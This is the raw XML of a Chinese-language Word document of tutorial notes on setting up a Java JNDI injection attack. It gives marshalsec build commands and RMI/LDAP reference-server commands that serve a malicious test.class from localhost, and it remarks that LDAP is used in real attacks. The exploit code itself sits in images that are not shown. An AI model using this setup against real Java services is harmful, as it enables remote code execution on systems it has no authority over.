        </w:rPr>
        <w:t>（jdk</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1.</w:t>
      </w:r>
      <w:r w:rsidR="00B2417A">
        <w:t>8u102</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F33A053" w14:textId="0D58405E" w:rsidR="00660BC3" w:rsidRDefault="00D50617">
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>)(2)(4).</w:t>
      </w:r>
      <w:r w:rsidR="008B27DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>客户端代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182B581E" w14:textId="7D87404A" w:rsidR="00660BC3" w:rsidRDefault="00D50617">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B89CDD1" wp14:editId="6E1A2EEE">
            <wp:extent cx="5274310" cy="2927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6360" w14:textId="2B915BCB" w:rsidR="00D50617" w:rsidRDefault="00D50617">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="008B27DE">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidR="008B27DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务端代码，绑定了web服务</w:t>
      </w:r>
      <w:r w:rsidR="008B27DE" w:rsidRPr="008B27DE">
        <w:t>http://127.0.0.1/目录下的test.class</w:t>
      </w:r>
      <w:r w:rsidR="008B27DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，在rmi注册器上的名为obj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0392E7FC" w14:textId="04D88D63" w:rsidR="00660BC3" w:rsidRDefault="008B27DE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DC5F4D2" wp14:editId="32F53AAB">
            <wp:extent cx="5274310" cy="33096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CB96" w14:textId="508680DD" w:rsidR="008B27DE" w:rsidRDefault="008B27DE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>5).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r>
        <w:t>.java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，要用javac</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r>
        <w:t>.java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令生成test</w:t>
      </w:r>
      <w:r>
        <w:t>.class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，放在</w:t>
      </w:r>
      <w:r w:rsidR="003639AD" w:rsidRPr="003639AD">
        <w:t>http://127.0.0.1/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2C1B43" w14:textId="25AD2C46" w:rsidR="008B27DE" w:rsidRDefault="008B27DE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4ADF1E7D" wp14:editId="3F4BD867">
            <wp:extent cx="3480679" cy="2357609"/>
            <wp:effectExtent l="0" t="0" r="571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9089" cy="236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31D9" w14:textId="26ED496B" w:rsidR="008738F1" w:rsidRDefault="008738F1"/>
    <w:p w14:paraId="782663D0" w14:textId="6032892D" w:rsidR="008738F1" w:rsidRDefault="008738F1">
      <w:r>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>番外篇：开启rmi</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ldap服务器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC568F4" w14:textId="08F468B8" w:rsidR="00C7467B" w:rsidRDefault="00C7467B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r>
        <w:t>marshalsec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启rmi服务，就不用运行上面的server端代码了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27250296" w14:textId="40DE01FB" w:rsidR="00C7467B" w:rsidRDefault="005A5786" w:rsidP="00C7467B">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>1)</w:t>
      </w:r>
      <w:r w:rsidR="00C7467B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载</w:t>
      </w:r>
      <w:r w:rsidR="00C7467B">
        <w:t>marshalsec：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E0FBD3" w14:textId="77777777" w:rsidR="00C7467B" w:rsidRDefault="00C7467B" w:rsidP="00C7467B">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>git clone https://github.com/mbechler/marshalsec.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F29A47F" w14:textId="32675B1C" w:rsidR="00C7467B" w:rsidRDefault="005A5786" w:rsidP="00C7467B">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>2)</w:t>
      </w:r>
      <w:r w:rsidR="00C7467B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r w:rsidR="00C7467B">
        <w:t>maven：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADB9F44" w14:textId="77C3B815" w:rsidR="008B27DE" w:rsidRDefault="00C7467B" w:rsidP="00C7467B">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>apt-get install maven</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A79F7FD" w14:textId="77777777" w:rsidR="009C3E4A" w:rsidRDefault="009C3E4A" w:rsidP="00C7467B">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420" w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A3C78D6" w14:textId="6DB5D330" w:rsidR="009C3E4A" w:rsidRDefault="009C3E4A" w:rsidP="009C3E4A">
      <w:r>
        <w:tab/>
        <w:t>win</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dows环境：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009C3E4A">
        <w:t>https://www.cnblogs.com/liuhongfeng/p/5057827.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B01E22" w14:textId="77777777" w:rsidR="009C3E4A" w:rsidRPr="009C3E4A" w:rsidRDefault="009C3E4A" w:rsidP="009C3E4A"/>
    <w:p w14:paraId="39030244" w14:textId="0D90D1C0" w:rsidR="00C7467B" w:rsidRDefault="005A5786" w:rsidP="00C7467B">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>3)</w:t>
      </w:r>
      <w:r w:rsidR="00C7467B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidR="00C7467B">
        <w:t>maven编译marshalsec成jar包，先进入下载的marshalsec文件中：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D0FFC7" w14:textId="437AB87B" w:rsidR="00C7467B" w:rsidRDefault="00C7467B" w:rsidP="00C7467B">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>mvn clean package -DskipTests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4B1AD8" w14:textId="77777777" w:rsidR="000C4C5F" w:rsidRDefault="009C3E4A">
      <w:r>
        <w:tab/>
        <w:t>(4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F442D8" w14:textId="653278A4" w:rsidR="00C7467B" w:rsidRDefault="009C3E4A" w:rsidP="000C4C5F">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动rmi服务器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42594F6A" w14:textId="2A23D052" w:rsidR="009C3E4A" w:rsidRDefault="009C3E4A" w:rsidP="00C74EB3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009C3E4A">
        <w:t>java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://</w:t>
      </w:r>
      <w:r w:rsidR="00C74EB3">
        <w:t>127.0.0.1:80</w:t>
      </w:r>
      <w:r w:rsidRPr="009C3E4A">
        <w:t xml:space="preserve">/#test" </w:t>
      </w:r>
      <w:r w:rsidR="00C74EB3">
        <w:t>1099</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFBB3EE" w14:textId="77777777" w:rsidR="000C4C5F" w:rsidRDefault="000C4C5F" w:rsidP="00C74EB3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E77EE03" w14:textId="6D306FEC" w:rsidR="009C3E4A" w:rsidRDefault="00C74EB3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动ldap服务：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317CB683" w14:textId="34193E4D" w:rsidR="009C3E4A" w:rsidRDefault="00C74EB3" w:rsidP="00C74EB3">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009C3E4A">
        <w:t>java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.</w:t>
      </w:r>
      <w:r>
        <w:t>LDAP</w:t>
      </w:r>
      <w:r w:rsidRPr="009C3E4A">
        <w:t>RefServer "http://</w:t>
      </w:r>
      <w:r>
        <w:t>127.0.0.1:80</w:t>
      </w:r>
      <w:r w:rsidRPr="009C3E4A">
        <w:t xml:space="preserve">/#test" </w:t>
      </w:r>
      <w:r>
        <w:t>1099</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39532BDF" w14:textId="46C6D431" w:rsidR="00517B51" w:rsidRDefault="00517B51" w:rsidP="00517B51">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54C72EE5" w14:textId="1D892655" w:rsidR="00517B51" w:rsidRDefault="00FA0957" w:rsidP="00517B51">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（ldap的限制比rmi相对较少，平常攻击使用ldap）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D72847A" w14:textId="77777777" w:rsidR="00517B51" w:rsidRPr="00C7467B" w:rsidRDefault="00517B51" w:rsidP="00517B51">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F4AA910" w14:textId="1DCF62D2" w:rsidR="005737AA" w:rsidRDefault="005737AA"/>
    <w:p w14:paraId="4F7C061A" w14:textId="24C8FE15" w:rsidR="005737AA" w:rsidRDefault="00BE044B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>番外篇2，配置jdk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC834AF" w14:textId="23844DFD" w:rsidR="00BE044B" w:rsidRDefault="00BE044B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先安装自己要的jdk就不讲了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B0AC6B" w14:textId="77777777" w:rsidR="00BE044B" w:rsidRDefault="00BE044B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69310DF2" w14:textId="01DF26D0" w:rsidR="00BE044B" w:rsidRDefault="00BE044B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68E097C2" wp14:editId="64FEF9FB">
            <wp:extent cx="2464044" cy="3656714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100" cy="365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516B" w14:textId="56D6C8AD" w:rsidR="005737AA" w:rsidRDefault="00BE044B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08DD7A74" wp14:editId="33489165">
            <wp:extent cx="5274310" cy="23050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A85E" w14:textId="1F970FF6" w:rsidR="005737AA" w:rsidRDefault="00BE044B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="014C0186" wp14:editId="202D11D1">
            <wp:extent cx="5274310" cy="17945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396C" w14:textId="07DA6503" w:rsidR="005737AA" w:rsidRDefault="00BE044B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6061D1B8" wp14:editId="7B8F044B">
            <wp:extent cx="5274310" cy="16256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D727" w14:textId="37D7ED01" w:rsidR="005737AA" w:rsidRDefault="005737AA"/>
    <w:p w14:paraId="71AC0053" w14:textId="6E955C7F" w:rsidR="005737AA" w:rsidRDefault="005737AA"/>
    <w:p w14:paraId="730A6726" w14:textId="7124161C" w:rsidR="005737AA" w:rsidRDefault="005737AA"/>
    <w:p w14:paraId="10713360" w14:textId="61CC9F72" w:rsidR="005737AA" w:rsidRDefault="005737AA"/>
    <w:p w14:paraId="020DD3C0" w14:textId="67811F79" w:rsidR="005737AA" w:rsidRDefault="005737AA"/>
    <w:p w14:paraId="5FA16409" w14:textId="4D87A082" w:rsidR="005737AA" w:rsidRDefault="005737AA"/>
    <w:p w14:paraId="67258300" w14:textId="251F86CC" w:rsidR="005737AA" w:rsidRDefault="005737AA"/>
    <w:p w14:paraId="4582F3E3" w14:textId="4BD312A5" w:rsidR="005737AA" w:rsidRDefault="005737AA"/>
    <w:p w14:paraId="7B7F3335" w14:textId="59DC6E57" w:rsidR="005737AA" w:rsidRDefault="005737AA"/>
    <w:p w14:paraId="7881E3A2" w14:textId="2A06AA80" w:rsidR="005737AA" w:rsidRDefault="005737AA"/>
    <w:p w14:paraId="5CC7B2A9" w14:textId="741DE624" w:rsidR="005737AA" w:rsidRDefault="005737AA"/>
    <w:p w14:paraId="3A12F0BC" w14:textId="03AA274E" w:rsidR="005737AA" w:rsidRDefault="005737AA"/>
    <w:p w14:paraId="31B287FF" w14:textId="2917FF01" w:rsidR="005737AA" w:rsidRDefault="005737AA"/>
    <w:p w14:paraId="189E9A24" w14:textId="178C0337" w:rsidR="005737AA" w:rsidRDefault="005737AA"/>
    <w:p w14:paraId="716407EE" w14:textId="25912315" w:rsidR="005737AA" w:rsidRDefault="005737AA"/>
    <w:p w14:paraId="4BFBAC94" w14:textId="11187C57" w:rsidR="005737AA" w:rsidRDefault="005737AA"/>
    <w:p w14:paraId="7366CF86" w14:textId="4A34312E" w:rsidR="005737AA" w:rsidRDefault="005737AA"/>
    <w:p w14:paraId="4F4F81F5" w14:textId="38398273" w:rsidR="005737AA" w:rsidRDefault="005737AA"/>
    <w:p w14:paraId="114E4594" w14:textId="02D00367" w:rsidR="005737AA" w:rsidRDefault="005737AA"/>
    <w:p w14:paraId="011F4895" w14:textId="28303E85" w:rsidR="005737AA" w:rsidRDefault="005737AA"/>
    <w:p w14:paraId="5DDB3C3D" w14:textId="3EA2EB9B" w:rsidR="005737AA" w:rsidRDefault="005737AA"/>
    <w:p w14:paraId="0B3569A3" w14:textId="1B223AE7" w:rsidR="005737AA" w:rsidRDefault="005737AA"/>
    <w:p w14:paraId="0B3A7B99" w14:textId="5DA46197" w:rsidR="005737AA" w:rsidRDefault="005737AA"/>
    <w:p w14:paraId="0640C2DD" w14:textId="7D804610" w:rsidR="005737AA" w:rsidRDefault="005737AA"/>
    <w:p w14:paraId="3D0CD357" w14:textId="77777777" w:rsidR="005737AA" w:rsidRDefault="005737AA"/>
    <w:sectPr w:rsidR="00573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1B34"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="806C4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A4"/>
    <w:rsid w:val="00003EE0"/>
    <w:rsid w:val="0004214A"/>
    <w:rsid w:val="00056DFD"/>
    <w:rsid w:val="000571A4"/>
    <w:rsid w:val="000C4C5F"/>
    <w:rsid w:val="000E42E0"/>
    <w:rsid w:val="001F689D"/>
    <w:rsid w:val="00235734"/>
    <w:rsid w:val="002E01EC"/>
    <w:rsid w:val="0031093B"/>
    <w:rsid w:val="003639AD"/>
    <w:rsid w:val="003A4E8B"/>
    <w:rsid w:val="00517B51"/>
    <w:rsid w:val="00554A5E"/>
    <w:rsid w:val="005737AA"/>
    <w:rsid w:val="005A5786"/>
    <w:rsid w:val="005E239E"/>
    <w:rsid w:val="00660BC3"/>
    <w:rsid w:val="006F2977"/>
    <w:rsid w:val="00730FF2"/>
    <w:rsid w:val="00744EBF"/>
    <w:rsid w:val="00765458"/>
    <w:rsid w:val="00802779"/>
    <w:rsid w:val="00827E09"/>
    <w:rsid w:val="008738F1"/>
    <w:rsid w:val="00883A86"/>
    <w:rsid w:val="008B27DE"/>
    <w:rsid w:val="009C3E4A"/>
    <w:rsid w:val="00AB4162"/>
    <w:rsid w:val="00B2417A"/>
    <w:rsid w:val="00B532B9"/>
    <w:rsid w:val="00BC3EA6"/>
    <w:rsid w:val="00BE044B"/>
    <w:rsid w:val="00C7467B"/>
    <w:rsid w:val="00C74EB3"/>
    <w:rsid w:val="00D2399F"/>
    <w:rsid w:val="00D50617"/>
    <w:rsid w:val="00D84283"/>
    <w:rsid w:val="00DD5F04"/>
    <w:rsid w:val="00DD7F59"/>
    <w:rsid w:val="00EF3248"/>
    <w:rsid w:val="00F9344B"/>
    <w:rsid w:val="00FA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FF33"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2D30D3AF-090E-4F03-AD8D-99CCFDB9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论文格式_标题 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="10"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="0031093B"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:widowControl w:val="0"/>
      <w:spacing w:before="120" w:line="300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aliases w:val="论文格式——标题 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="20"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0031093B"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:widowControl w:val="0"/>
      <w:spacing w:after="120" w:line="300" w:lineRule="auto"/>
      <w:jc w:val="left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论文格式_标题3"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="a4"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="0031093B"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:spacing w:before="240" w:after="60"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="黑体" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a4">
    <w:name w:val="标题 字符"/>
    <w:aliases w:val="论文格式_标题3 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a3"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="0031093B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20">
    <w:name w:val="标题 2 字符"/>
    <w:aliases w:val="论文格式——标题 2 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="0031093B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10">
    <w:name w:val="标题 1 字符"/>
    <w:aliases w:val="论文格式_标题 1 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="0031093B"/>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a5">
    <w:name w:val="图片描述"/>
    <w:basedOn w:val="a6"/>
    <w:link w:val="a7"/>
    <w:qFormat/>
    <w:rsid w:val="00D2399F"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLineChars="200" w:firstLine="360"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a7">
    <w:name w:val="图片描述 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a5"/>
    <w:rsid w:val="00D2399F"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cstheme="majorBidi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D2399F"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="黑体" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="alt">
    <w:name w:val="alt"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00DD5F04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DD5F04"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="string">
    <w:name w:val="string"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00DD5F04"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="comment">
    <w:name w:val="comment"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00DD5F04"/>
  </w:style>
  <w:style w:type="character" w:styleId="HTML">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DD5F04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DD5F04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8B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3185B9"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="9835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3185B9"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="8712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3185B9"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="20231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3185B9"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1863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3185B9"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="10810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2" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="single" w:sz="18" w:space="6" w:color="3185B9"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="8879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rmi://kingx_kali:8080/tes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rmi://kingx_kali:808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rmi://0.0.0.0:1099/hello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8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1062290728@qq.com</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>1062290728@qq.com</cp:lastModifiedBy>
  <cp:revision>19</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-12-17T02:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-21T03:04:00Z</dcterms:modified>
</cp:coreProperties>
</file>